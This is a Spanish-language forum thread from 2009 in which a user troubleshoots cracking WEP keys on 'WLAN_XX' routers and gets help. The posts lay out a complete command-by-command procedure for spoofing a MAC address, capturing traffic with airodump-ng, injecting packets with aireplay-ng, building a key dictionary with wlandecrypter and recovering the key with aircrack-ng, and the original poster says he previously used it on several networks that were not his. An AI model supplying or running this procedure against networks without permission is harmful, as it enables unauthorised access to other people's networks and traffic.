Autor Tema: Aircrack no dice nada  (Leído 4227 veces)

0 Usuarios y 1 Visitante están viendo este tema.

er_maryi

  • Visitante
Aircrack no dice nada
« en: 23-02-2009, 20:06 (Lunes) »
Hola a todos. Soy nuevo en este foro, aunque lo sigo mucho para aprender, pero es la primera vez que escribo. Espero que el tema del que voy a hablar vaya aqui, sino, lo siento.
Era para comentar que desde hace tiempo no puedo encontrar la contraseña en las wifis. Hace un par de años, logré encontrar la contraseña en varias wifis del tipo WLAN_XX siguiendo este manual:

INTERFAZ usb0

--------CAMBIAR LA MAC-------------
ifconfig rausb0 down (desactivar dispositivo)
macchanger -m 00:80:5A:23:1B:2C rausb0  (cambiar la MAC por una inventada, pero coherente! )
ifconfig rausb0 up (activar dispositivo)

--------Configuracion para el AP y poner el dispositivo en modo monitor------
iwconfig rausb0 essid "nombre del AP" key 1111 rate 1M
iwconfig rausb0 mode monitor

--------Capturar paquetes----------------------
airodump-ng rausb0 -w "nombre para el fichero de salida"

--------Ataque 1: asociarte al AP--------------
aireplay-ng -1 0 -e "nombre del AP" -a "MAC del AP" -h "tu MAC" rausb    (el 0 es para el numero de veces que quieres que se ejecute, puede ser tambien un 30)

--------Ataque 3: inyectar paquetes------------
aireplay -3 -b "MAC del AP" -h "tu MAC" rausb

--------Esperar a que los data´s suban, si es de tipo "WLAN_XX" con 4 paquetes bastará, sino con 250000-500000.
Si es "WLAN_XX" utliza el Wlandecrypter del WifiSlax para obtener el diccionario-------

--------Obtener contraseña---------
aircrack-ng "fichero.cap" [-w "diccionario"]


Ahora utilizo un portatil hp pavilion 6755es (caracteristicas: http://h10025.www1.hp.com/ewfrf/wc/document?docname=c01374513&lc=es&dlc=es&cc=es&lang=es&product=3668276) y capturo con un usb rt2500usb. Como digo, hace 2 años me funcionaba (pero utilizando otro ordenador), ahora tengo este que os digo, y el problema es que al ejecutar el aircrack simplemente no me dice nada (ni que haya encontrado la contraseña ni que no), se para la ejecucion y ya esta (pone que ha testado algunas key´s). La red es del tipo WLAN_XX y llego a capturar más de 100 paquetes, genero el diccionario correcto y como digo, haciendo esto antes me conseguia la contraseña. He utilizado el wifislax 3.0, 3.1 y wifiway. Y les pasa a todos lo mismo. Tambien probé en otro portatil y ocurre lo mismo: el aircrack no dice nada.
Intente encontrar la contraseña de mi propia wifi, y lo mismo. Incluso le pase al aircrack un diccionario que contenia la contraseña, y no me dijo nada.
Me podias ayudar?gracias!



Phyrok

  • Visitante
Re: Aircrack no dice nada
« Respuesta #1 en: 23-02-2009, 20:33 (Lunes) »
Saludos.

¿Estás usando la rc1 o rc2 del aircrack-ng? Si es así, prueba el ataque de esta forma:
Código: [Seleccionar]
aircrack-ng -K -w /ruta/diccionario.txt /ruta/capturas.cap

er_maryi

  • Visitante
Re: Aircrack no dice nada
« Respuesta #2 en: 23-02-2009, 20:58 (Lunes) »
Hola, gracias por la velocidad de la respuesta!
La verdad, no lo se, que es eso de rc1 o rc2?como lo miro?
Al principio me sorprendio mucho lo de que no encontrará la contraseña (en tantas WLAN_XX), pero lo que me flipó ya del todo es que en el diccionario estuviera la contraseña y no me dijiera nada.

Phyrok

  • Visitante
Re: Aircrack no dice nada
« Respuesta #3 en: 23-02-2009, 21:10 (Lunes) »
Saludos.

Lo de rc1 o rc2 es la versión (aircrack-ng 1.0rc2) El problema de estas últimas versiones es que no pillan bien el diccionario, por lo que te recomiendo poner el comando que puse anteriormente, introduciendo también la opción -K, pues con ella sí funciona.

EDIT: Se me olvidaba, para ver la versión que estás usando, basta con poner aircrack-ng en la consola, al principio antes de todos los comandos de uso pone la versión instalada.
« Última modificación: 23-02-2009, 21:17 (Lunes) por Phyrok »

er_maryi

  • Visitante
Re: Aircrack no dice nada
« Respuesta #4 en: 24-02-2009, 00:49 (Martes) »
Hola. Mira, te pongo la captura:

 
wifiway ~ # aircrack-ng

  Aircrack-ng 0.9.3 - (C) 2006,2007,2008 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
      -e <essid> : target selection: network identifier
      -b <bssid> : target selection: access point's MAC
      -p <nbcpu> : # of CPU to use (by default, all CPUs)
      -q         : enable quiet mode (no status output)

  Static WEP cracking options:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d <mask>  : debug - specify mask of the key (A1:XX:CF:YY)
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length :  64/128/152/256/512
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x or -x0  : disable last keybytes bruteforce
      -x1        : enable last keybyte bruteforcing (default)
      -x2        : enable last two keybytes bruteforcing
      -X         : disable bruteforce multithreading (SMP only)
      -y         : experimental single bruteforce mode
      -z         : PTW attack
      -s         : show ASCII version of the key

  WEP and WPA-PSK cracking options:

      -w <words> : path to a dictionary file (multiple
                    dictionnaries can be specified.
                    See manpage for more information)

      --help     : Displays this usage screen

No file to crack specified.
wifiway ~ # aircrack-ng -K -w /root/swireless/wordlist/wordlist /root/este-01.cap
aircrack-ng: invalid option -- K
"aircrack-ng --help" for help.
wifiway ~ # aircrack-ng -w /root/swireless/wordlist/wordlist /root/este-01.cap
Opening /root/este-01.cap
Read 93 packets.

   #  BSSID              ESSID                     Encryption

   1  00:02:CF:B9:5D:6B  WLAN_DF                   WEP (50 IVs)
   2  00:14:A5:82:AB:AE  Router_Wifi               No data - WEP or WPA
   3  00:02:CF:98:91:DA                            WEP (5 IVs)

Index number of target network ? 1


                                                       Aircrack-ng 0.9.3


                                       [00:00:02] Tested 60355 keys (got 50 IVs)

   KB    depth   byte(vote)
    0    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    1    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    2    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    3    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    4    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    5    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    6    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    7    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    8    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    9    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
   10    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
   11    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
   12    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)


wifiway ~ #


Como ves la opcion -K no la contempla.
Gracias!

manel

  • Visitante
Re: Aircrack no dice nada
« Respuesta #5 en: 24-02-2009, 08:11 (Martes) »
Buenas:

Para crear el diccionario:

#wlandecrypter [bssid] [essid] diccionario

Para sacar la clave:

#aircrack-ng -w diccionario -K [archivo_captura]-01.cap

Un saludo


er_maryi

  • Visitante
Re: Aircrack no dice nada
« Respuesta #6 en: 24-02-2009, 13:14 (Martes) »
La opcion esa de -K no esta en mi aircrack-ng:
wifislax ~ # aircrack-ng

  Aircrack-ng 0.9.1 r511 - (C) 2006,2007 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
      -e <essid> : target selection: network identifier
      -b <bssid> : target selection: access point's MAC
      -q         : enable quiet mode (no status output)

  Static WEP cracking options:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d <mask>  : debug - specify mask of the key (A1:XX:CF:YY)
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length :  64/128/152/256/512
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x or -x0  : disable last keybytes bruteforce
      -x1        : enable last keybyte bruteforcing (default)
      -x2        : enable last two keybytes bruteforcing
      -y         : experimental single bruteforce mode
      -z         : PTW attack
      -s         : show ASCII version of the key

  WEP and WPA-PSK cracking options:

      -w <words> : path to a dictionary file (multiple
                    dictionnaries can be specified.
                    See manpage for more information)

      --help     : Displays this usage screen

No file to crack specified.

Si podeis y quereis, os mando el fichero .cap y el diccionario aver si podeis vosotros...
gracias!

Phyrok

  • Visitante
Re: Aircrack no dice nada
« Respuesta #7 en: 24-02-2009, 14:19 (Martes) »
Saludos.

Ok, no tienes la version 1.0, por lo tanto el bug no está presente, y no hace falta la opcion -K. Por otro lado, creo saber ya cual es tu problema, según dices, uno de tus pasos es
Código: [Seleccionar]
iwconfig rausb0 essid "nombre del AP" key 1111 rate 1M
Pues bien, ese paso sobra completamente, al estar metiendo una clave falsa, que lo más posible es que te de un falso positivo, o te impida completamente obtener la clave (como te está sucediendo). Te pongo unos pasos para que los pruebes de esta forma.

En una terminal
Código: [Seleccionar]
ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
ifconfig rausb0 up
iwconfig rausb0 rate 1M
airodump-ng rausb0

Después del último paso, cuando hayas elegido el ap a atacar, pulsas control c, y seguimos:
Código: [Seleccionar]
airmon-ng start rausb0 <canal-ap>
airodump-ng -c <canal-ap> -w /ruta/archivo/capturas rausb0

En una segunda terminal
Código: [Seleccionar]
aireplay-ng -1 30 -a <mac-del-ap> -h 00:11:22:33:44:55 rausb0
Y en una tercera terminal
Código: [Seleccionar]
aireplay-ng -3 -b <mac-del-ap> -h 00:11:22:33:44:55 rausb0
Ahora esperas a tener 5 #Data si se trata de una red WLAN_XX, y una vez que las tengamos, en una cuarta terminal
Código: [Seleccionar]
wlandecrypter <mac-ap> <nombre-ap(WLAN_XX)> /ruta/diccionario-a-crear.txt
aircrack-ng -w /ruta/diccionario.txt /ruta/archivo/capturas.cap
Con esto deberías obtenerla.

er_maryi

  • Visitante
Re: Aircrack no dice nada
« Respuesta #8 en: 24-02-2009, 21:35 (Martes) »
Hola Phyrok!!!
Ya esta solucionado, ha debido ser lo que tu decias.
Muchas gracias por la explicacion del problema y por la rapidez......SOIS LO MEJOR!!